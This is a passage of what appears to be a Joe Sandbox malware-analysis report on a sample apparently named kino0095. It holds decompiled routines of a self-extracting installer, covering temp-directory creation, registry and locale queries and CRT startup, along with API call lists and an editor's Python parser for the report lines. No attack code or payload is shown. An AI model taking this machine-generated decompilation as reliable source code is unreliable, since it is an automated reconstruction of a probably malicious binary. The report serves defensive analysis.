                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 010B4630
                                                                                                                                                                                                                                    • MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 010B4666
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 010B466F
                                                                                                                                                                                                                                      • Part of subcall function 010B681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010B686E
                                                                                                                                                                                                                                      • Part of subcall function 010B681F: GetSystemMetrics.USER32(0000004A), ref: 010B68A7
                                                                                                                                                                                                                                      • Part of subcall function 010B681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010B68CC
                                                                                                                                                                                                                                      • Part of subcall function 010B681F: RegQueryValueExA.ADVAPI32(?,010B1140,00000000,?,?,0000000C), ref: 010B68F4
                                                                                                                                                                                                                                      • Part of subcall function 010B681F: RegCloseKey.ADVAPI32(?), ref: 010B6902
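Reading the API list: the routine loads string resource 0x4B1 via LoadStringA, shows it (or the fallback text "LoadString() Error. Could not load string resource.") in a MessageBoxA with caption "doza2" and flags 0x00010010 (MB_ICONHAND | MB_SETFOREGROUND), and the sub-function at 010B681F opens HKCU\Control Panel\Desktop\ResourceLocale with KEY_READ (0x20019) and calls GetSystemMetrics(0x4A), the SM_MIDEASTENABLED index in winuser.h. That sub-function is the concrete code behind the "Contains functionality to query locales information" signature in the summary. The following parser is an added example, not part of the Joe Sandbox report or of the sample: it turns these report lines (copied verbatim from the list above) into structured calls, decodes the SDK constants they use, and flags the locale-probing call sites. The `locale_probe_refs` heuristic is the editor's own triage rule, not a report signature.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Lines copied verbatim from the "APIs" block of this report section (not constructed).
REPORT_LINES = r"""
• LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
• MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
• LocalAlloc.KERNEL32(00000040,00000065), ref: 010B45A3
• LocalAlloc.KERNEL32(00000040,00000065), ref: 010B45E3
• LocalAlloc.KERNEL32(00000040,00000002), ref: 010B460D
• MessageBeep.USER32(00000000), ref: 010B4630
• MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 010B4666
• LocalFree.KERNEL32(00000000), ref: 010B466F
  • Part of subcall function 010B681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010B686E
  • Part of subcall function 010B681F: GetSystemMetrics.USER32(0000004A), ref: 010B68A7
  • Part of subcall function 010B681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010B68CC
  • Part of subcall function 010B681F: RegQueryValueExA.ADVAPI32(?,010B1140,00000000,?,?,0000000C), ref: 010B68F4
  • Part of subcall function 010B681F: RegCloseKey.ADVAPI32(?), ref: 010B6902
"""

# One report line: optional "Part of subcall function X:" prefix, API.MODULE(args), ref: ADDR
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw tokens: 8-hex-digit immediates, '?' for unknown, or strings
    ref: str                 # address of the call instruction
    subcall: Optional[str]   # address of the callee when the call sits inside a sub-function

def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # blank or unrelated line
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls

HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

def imm(tok: str) -> Optional[int]:
    """Integer value of an 8-hex-digit immediate, or None for '?' and string arguments."""
    return int(tok, 16) if HEX8.match(tok) else None

# Constants from the Windows SDK headers; only the values this listing uses.
HKEY_NAMES = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
KEY_READ = 0x20019
LPTR = 0x40                      # LMEM_FIXED | LMEM_ZEROINIT
MB_BITS = {0x10: "MB_ICONHAND", 0x10000: "MB_SETFOREGROUND"}
SM_MIDEASTENABLED = 0x4A

def describe(c: ApiCall) -> str:
    """Human-readable decode of the arguments worth reading in this listing."""
    if c.api == "RegOpenKeyExA":
        root = HKEY_NAMES.get(imm(c.args[0]), c.args[0])
        access = "KEY_READ" if imm(c.args[3]) == KEY_READ else c.args[3]
        return f"RegOpenKeyExA({root}, {c.args[1]!r}, {access})"
    if c.api == "MessageBoxA":
        v = imm(c.args[3]) or 0
        names = [n for bit, n in MB_BITS.items() if v & bit] or ["MB_OK"]
        return f"MessageBoxA(caption={c.args[2]!r}, {'|'.join(names)})"
    if c.api == "LocalAlloc":
        flags = "LPTR" if imm(c.args[0]) == LPTR else c.args[0]
        return f"LocalAlloc({flags}, {imm(c.args[1])} bytes)"
    if c.api == "GetSystemMetrics" and imm(c.args[0]) == SM_MIDEASTENABLED:
        return "GetSystemMetrics(SM_MIDEASTENABLED)"
    return f"{c.api}({', '.join(c.args)})"

def locale_probe_refs(calls: List[ApiCall]) -> List[str]:
    """Call sites that read locale/language settings (editor's triage heuristic)."""
    hits = []
    for c in calls:
        if c.api == "RegOpenKeyExA" and "ResourceLocale" in c.args[1]:
            hits.append(c.ref)
        elif c.api == "GetSystemMetrics" and imm(c.args[0]) == SM_MIDEASTENABLED:
            hits.append(c.ref)
    return hits

if __name__ == "__main__":
    parsed = parse_api_lines(REPORT_LINES)
    for c in parsed:
        where = f"(in sub {c.subcall})" if c.subcall else ""
        print(f"{c.ref} {describe(c)} {where}")
    print("locale probes at:", locale_probe_refs(parsed))
```

Running it prints one decoded call per line and reports the two locale-probing call sites, 010B68A7 and 010B68CC, both inside sub-function 010B681F. The same parser works on any "APIs" block in a report of this format, which makes it a quick way to diff call sequences between functions or between samples.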
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
• String ID: LoadString() Error. Could not load string resource.$doza2
• API String ID: 3244514340-3130468218
• Opcode ID: cb23c313fbce0aaea792adf2b729bf2a3d57bb88e68df11465b7ae8447a30f92
• Instruction ID: d53fc65b1c9559e39e10d0ef57780a8e7272642edac5396482d3fe4aeb9e36e5
• Opcode Fuzzy Hash: cb23c313fbce0aaea792adf2b729bf2a3d57bb88e68df11465b7ae8447a30f92
• Instruction Fuzzy Hash: 90510771A00219ABDB619E28DCC8BEA7BB8EF45300F004595EDCAF7246DB36DE05CB50
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 95%
    // Decompiled routine: given a base directory (__ecx) and an output buffer (__edx),
    // look for a free IXP%03d.TMP subdirectory (up to 0x190 = 400 candidates) and create it;
    // if none can be created, fall back to GetTempFileNameA with the "IXP" prefix.
    E010B53A1(CHAR* __ecx, CHAR* __edx) {
        signed int _v8;
        char _v268;
        void* __ebx;
        void* __edi;
        void* __esi;
        signed int _t5;
        long _t13;
        int _t14;
        CHAR* _t20;
        int _t29;
        int _t30;
        CHAR* _t32;
        signed int _t33;
        void* _t34;

        _t5 =  *0x10b8004; // 0x72151d89  (stack-cookie seed)
        _v8 = _t5 ^ _t33;
        _t32 = __edx;  // output path buffer
        _t20 = __ecx;  // base directory
        _t29 = 0;      // candidate counter for IXP%03d.TMP
        while(1) {
            E010B171E( &_v268, 0x104, "IXP%03d.TMP", _t29); // _vsnprintf subcall
            _t34 = _t34 + 0x10;
            _t29 = _t29 + 1;
            E010B1680(_t32, 0x104, _t20);      // copy base directory into buffer
            E010B658A(_t32, 0x104,  &_v268);   // append IXPnnn.TMP component // executed
            RemoveDirectoryA(_t32); // executed
            _t13 = GetFileAttributesA(_t32); // executed
            if(_t13 == 0xffffffff) {
                break; // path does not exist: try to create it below
            }
            if(_t29 < 0x190) {
                continue;
            }
            L3:
            // Fallback: let the system pick a unique IXP* name, then turn it into a directory
            _t30 = 0;
            if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                _t30 = 1;
                DeleteFileA(_t32);
                CreateDirectoryA(_t32, 0);
            }
            L5:
            return E010B6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32); // stack-cookie check, returns _t30
        }
        _t14 = CreateDirectoryA(_t32, 0); // executed
        if(_t14 == 0) {
            goto L3;
        }
        _t30 = 1;
         *0x10b8a20 = 1; // global flag: extraction directory was created
        goto L5;
    }

APIs
  • Part of subcall function 010B171E: _vsnprintf.MSVCRT ref: 010B1750
• RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B53FB
• GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B5402
• GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B541F
• DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B542B
• CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B5434
• CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B5452
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
• API String ID: 1082909758-4044985724
• Opcode ID: 023f32c80d5ede0a5537b19215be418a69f216213be1fb61f8e51b731f8b41ff
• Instruction ID: 8538a2952ca30043fb2793308c3c95e367eeb0c587777fd52e0b4070bbd339af
• Opcode Fuzzy Hash: 023f32c80d5ede0a5537b19215be418a69f216213be1fb61f8e51b731f8b41ff
• Instruction Fuzzy Hash: 06110471701104B7E3209B269CC8FEF3A6DEBD5711F004169F6C6D3280DF7A894287A4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 75%
E010B5467(CHAR* __ecx, void* __edx, char* _a4) {
	signed int _v8;
	char _v268;
	struct _SYSTEM_INFO _v304;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t10;
	void* _t13;
	intOrPtr _t14;
	void* _t16;
	void* _t20;
	signed int _t26;
	void* _t28;
	void* _t29;
	CHAR* _t48;
	signed int _t49;
	intOrPtr _t61;

	// Stack-cookie prologue: global cookie XOR frame pointer, checked again on return.
	_t10 =  *0x10b8004; // 0x72151d89
	_v8 = _t10 ^ _t49;
	_push(__ecx);
	if(__edx == 0) {
		// No caller-supplied path: use the default directory string at 0x10b91e4.
		_t48 = 0x10b91e4;
		_t42 = 0x104;
		E010B1680(0x10b91e4, 0x104);
		L14:
		_t13 = E010B58C8(_t48); // executed
		if(_t13 != 0) {
			L17:
			_t42 = _a4;
			if(_a4 == 0) {
				L23:
				 *0x10b9124 = 0;
				_t14 = 1;
				L24:
				// Stack-cookie epilogue and return.
				return E010B6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
			}
			_t16 = E010B597D(_t48, _t42, 1, 0); // executed
			if(_t16 != 0) {
				goto L23;
			}
			_t61 =  *0x10b8a20; // 0x0
			if(_t61 != 0) {
				// The directory was created by this function (flag at 0x10b8a20); remove it again on failure.
				 *0x10b8a20 = 0;
				RemoveDirectoryA(_t48);
			}
			L22:
			_t14 = 0;
			goto L24;
		}
		if(CreateDirectoryA(_t48, 0) == 0) {
			// Store the last error code (via E010B6285) at 0x10b9124 and fail.
			 *0x10b9124 = E010B6285();
			goto L22;
		}
		 *0x10b8a20 = 1;
		goto L17;
	}
	_t42 =  &_v268;
	_t20 = E010B53A1(__ecx,  &_v268); // executed
	if(_t20 == 0) {
		goto L22;
	}
	_push(__ecx);
	_t48 = 0x10b91e4;
	E010B1781(0x10b91e4, 0x104, __ecx,  &_v268);
	if(( *0x10b9a34 & 0x00000020) == 0) {
		L12:
		_t42 = 0x104;
		E010B658A(_t48, 0x104, 0x10b1140);
		goto L14;
	}
	// Append an architecture name to the path based on SYSTEM_INFO.wProcessorArchitecture
	// (the low word of the dwOemId union): 0 = INTEL, 1 = MIPS, 2 = ALPHA, 3 = PPC.
	GetSystemInfo( &_v304);
	_t26 = _v304.dwOemId & 0x0000ffff;
	if(_t26 == 0) {
		_push("i386");
		L11:
		E010B658A(_t48, 0x104);
		goto L12;
	}
	_t28 = _t26 - 1;
	if(_t28 == 0) {
		_push("mips");
		goto L11;
	}
	_t29 = _t28 - 1;
	if(_t29 == 0) {
		_push("alpha");
		goto L11;
	}
	if(_t29 != 1) {
		goto L12;
	}
	_push("ppc");
	goto L11;
}

Addresses: 0x010b5472, 0x010b5479, 0x010b5481, 0x010b5484, 0x010b551c, 0x010b5521, 0x010b5528, 0x010b552d, 0x010b552f, 0x010b5539, 0x010b554d, 0x010b554d, 0x010b5552, 0x010b5585, 0x010b5585, 0x010b558b, 0x010b558d, 0x010b559d, 0x010b559d, 0x010b5557, 0x010b555e, 0x00000000, 0x00000000, 0x010b5560, 0x010b5566, 0x010b5569, 0x010b556f, 0x010b556f, 0x010b5581, 0x010b5581, 0x00000000, 0x010b5581, 0x010b5545, 0x010b557c, 0x00000000, 0x010b557c, 0x010b5547
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5547
                                                                                                                                                                                                                                    0x010b548a
                                                                                                                                                                                                                                    0x010b5490
                                                                                                                                                                                                                                    0x010b5497
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b549d
                                                                                                                                                                                                                                    0x010b54ab
                                                                                                                                                                                                                                    0x010b54b4
                                                                                                                                                                                                                                    0x010b54c0
                                                                                                                                                                                                                                    0x010b550c
                                                                                                                                                                                                                                    0x010b5511
                                                                                                                                                                                                                                    0x010b5515
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5515
                                                                                                                                                                                                                                    0x010b54c9
                                                                                                                                                                                                                                    0x010b54d6
                                                                                                                                                                                                                                    0x010b54d8
                                                                                                                                                                                                                                    0x010b54fe
                                                                                                                                                                                                                                    0x010b5503
                                                                                                                                                                                                                                    0x010b5507
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5507
                                                                                                                                                                                                                                    0x010b54da
                                                                                                                                                                                                                                    0x010b54dd
                                                                                                                                                                                                                                    0x010b54f7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b54f7
                                                                                                                                                                                                                                    0x010b54df
                                                                                                                                                                                                                                    0x010b54e2
                                                                                                                                                                                                                                    0x010b54f0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b54f0
                                                                                                                                                                                                                                    0x010b54e7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b54e9
                                                                                                                                                                                                                                    0x00000000

APIs
• GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B54C9
• CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B553D
• RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B556F
  • Part of subcall function 010B53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B53FB
  • Part of subcall function 010B53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B5402
  • Part of subcall function 010B53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B541F
  • Part of subcall function 010B53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B542B
  • Part of subcall function 010B53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B5434
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
• API String ID: 1979080616-3963195772
• Opcode ID: b088c0b9517208ba70acd11f934139a8946444ec0cda07e052a885b4b8def173
• Instruction ID: bbe374360fe8bbb8a30bc0545e93af4df2ccbfd0752b24a25a5286d5c7cf491e
• Opcode Fuzzy Hash: b088c0b9517208ba70acd11f934139a8946444ec0cda07e052a885b4b8def173
• Instruction Fuzzy Hash: 9B315BB0B002059BEB609F2EACE45FE77DFAB91645F0441EEA5C2D3244DB75CE018794
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 563 10b256d-10b257d 564 10b2583-10b2589 563->564 565 10b2622-10b2627 call 10b24e0 563->565 567 10b258b 564->567 568 10b25e8-10b2607 RegOpenKeyExA 564->568 572 10b2629-10b262f 565->572 567->572 573 10b2591-10b2595 567->573 569 10b2609-10b2620 RegQueryInfoKeyA 568->569 570 10b25e3-10b25e6 568->570 574 10b25d1-10b25dd RegCloseKey 569->574 570->572 573->572 575 10b259b-10b25ba RegOpenKeyExA 573->575 570->572 576 10b25bc-10b25cb RegQueryValueExA 575->576 576->574
C-Code - Quality: 86%
E010B256D(signed int __ecx) {
    int _v8;
    void* _v12;
    signed int _t13;
    signed int _t19;
    long _t24;
    void* _t26;
    int _t31;
    void* _t34;

    _push(__ecx);
    _push(__ecx);
    _t13 = __ecx & 0x0000ffff;
    _t31 = 0;
    if(_t13 == 0) {
        _t31 = E010B24E0(_t26);
    } else {
        _t34 = _t13 - 1;
        if(_t34 == 0) {
            _v8 = 0;
            if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                goto L7;
            } else {
                _t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                goto L6;
            }
            L12:
        } else {
            if(_t34 > 0 && __ecx <= 3) {
                _v8 = 0;
                _t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                if(_t24 == 0) {
                    _t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                    L6:
                    asm("sbb eax, eax");
                    _v8 = _v8 &  !( ~_t19);
                    RegCloseKey(_v12); // executed
                }
                L7:
                _t31 = _v8;
            }
        }
    }
    return _t31;
    goto L12;
}

Instruction addresses: 0x010b2572, 0x010b2573, 0x010b2575, 0x010b2578, 0x010b257d, 0x010b2627, 0x010b2583, 0x010b2586, 0x010b2589, 0x010b25eb, 0x010b2607, 0x00000000, 0x010b2609, 0x010b261a, 0x00000000, 0x010b261a, 0x00000000, 0x010b258b, 0x010b258b, 0x010b259e, 0x010b25b2, 0x010b25ba, 0x010b25cb, 0x010b25d1, 0x010b25d6, 0x010b25da, 0x010b25dd, 0x010b25dd, 0x010b25e3, 0x010b25e3, 0x010b25e3, 0x010b258b, 0x010b2589, 0x010b262f, 0x00000000

APIs
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,010B4096,010B4096,?,010B1ED3,00000001,00000000,?,?,010B4137,?), ref: 010B25B2
• RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,010B4096,?,010B1ED3,00000001,00000000,?,?,010B4137,?,010B4096), ref: 010B25CB
• RegCloseKey.KERNELBASE(?,?,010B1ED3,00000001,00000000,?,?,010B4137,?,010B4096), ref: 010B25DD
• RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,010B4096,010B4096,?,010B1ED3,00000001,00000000,?,?,010B4137,?), ref: 010B25FF
• RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,010B4096,00000000,00000000,00000000,00000000,?,010B1ED3,00000001,00000000), ref: 010B261A
Strings
• System\CurrentControlSet\Control\Session Manager, xrefs: 010B25A8
• System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010B25F5
• PendingFileRenameOperations, xrefs: 010B25C3
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: OpenQuery$CloseInfoValue
• String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
• API String ID: 2209512893-559176071
• Opcode ID: ae4ad40d941e7b9069b34d71fe50b3386a21f97b206da39d84ad67badec261b7
• Instruction ID: 6e1f150c7f1fce61c6bfd5fc1004726910698bea8c379a0965d33a4e708f5163
• Opcode Fuzzy Hash: ae4ad40d941e7b9069b34d71fe50b3386a21f97b206da39d84ad67badec261b7
• Instruction Fuzzy Hash: 0D114235A52228FB9B309B969C89DFFBEBCEF057A1F104095B989A2000D6356A44D6A0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 577 10b6a60-10b6a91 call 10b7155 call 10b7208 GetStartupInfoW 583 10b6a93-10b6aa2 577->583 584 10b6abc-10b6abe 583->584 585 10b6aa4-10b6aa6 583->585 588 10b6abf-10b6ac5 584->588 586 10b6aa8-10b6aad 585->586 587 10b6aaf-10b6aba Sleep 585->587 586->588 587->583 589 10b6ad1-10b6ad7 588->589 590 10b6ac7-10b6acf _amsg_exit 588->590 592 10b6ad9-10b6ae9 call 10b6c3f 589->592 593 10b6b05 589->593 591 10b6b0b-10b6b11 590->591 594 10b6b2e-10b6b30 591->594 595 10b6b13-10b6b24 _initterm 591->595 599 10b6aee-10b6af2 592->599 593->591 597 10b6b3b-10b6b42 594->597 598 10b6b32-10b6b39 594->598 595->594 600 10b6b67-10b6b71 597->600 601 10b6b44-10b6b51 call 10b7060 597->601 598->597 599->591 602 10b6af4-10b6b00 599->602 604 10b6b74-10b6b79 600->604 601->600 610 10b6b53-10b6b65 601->610 605 10b6c39-10b6c3e call 10b724d 602->605 608 10b6b7b-10b6b7d 604->608 609 10b6bc5-10b6bc8 604->609 614 10b6b7f-10b6b81 608->614 615 10b6b94-10b6b98 608->615 612 10b6bca-10b6bd3 609->612 613 10b6bd6-10b6be3 _ismbblead 609->613 610->600 612->613 618 10b6be9-10b6bed 613->618 619 10b6be5-10b6be6 613->619 614->609 620 10b6b83-10b6b85 614->620 616 10b6b9a-10b6b9e 615->616 617 10b6ba0-10b6ba2 615->617 622 10b6ba3-10b6bbc call 10b2bfb 616->622 617->622 618->604 624 10b6c1e-10b6c25 618->624 619->618 620->615 621 10b6b87-10b6b8a 620->621 621->615 625 10b6b8c-10b6b92 621->625 622->624 630 10b6bbe-10b6bbf exit 622->630 626 10b6c32 624->626 627 10b6c27-10b6c2d _cexit 624->627 625->620 626->605 627->626 630->609
C-Code - Quality: 51%
			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E010B7155();
				_push(0x58);
				_push(0x10b72b8);
				E010B7208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x10b88b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x10b88b0; // 0x2
						if(__eflags != 0) {
							 *0x10b81e4 = _t58;
							goto L13;
						} else {
							 *0x10b88b0 = _t58;
							_t37 = E010B6C3F(0x10b10b8, 0x10b10c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
                                                                                                                                                                                                                                    								goto L13;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                    								_t30 = 0xff;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_push(0x1f);
                                                                                                                                                                                                                                    						L010B6FF4();
                                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                                    						_t68 =  *0x10b88b0 - _t58; // 0x2
                                                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                                                    							_push(0x10b10b4);
                                                                                                                                                                                                                                    							_push(0x10b10ac);
                                                                                                                                                                                                                                    							L010B7202();
                                                                                                                                                                                                                                    							 *0x10b88b0 = 2;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t53 == 0) {
                                                                                                                                                                                                                                    							 *0x10b88ac = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t71 =  *0x10b88b4;
                                                                                                                                                                                                                                    						if( *0x10b88b4 != 0 && E010B7060(_t71, 0x10b88b4) != 0) {
                                                                                                                                                                                                                                    							_t60 =  *0x10b88b4; // 0x0
                                                                                                                                                                                                                                    							 *0x10ba288(0, 2, 0);
                                                                                                                                                                                                                                    							 *_t60();
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                                                    						_t59 =  *_t25;
                                                                                                                                                                                                                                    						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                    						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                    							_t41 =  *_t59;
                                                                                                                                                                                                                                    							if(_t41 > 0x20) {
                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							if(_t41 != 0) {
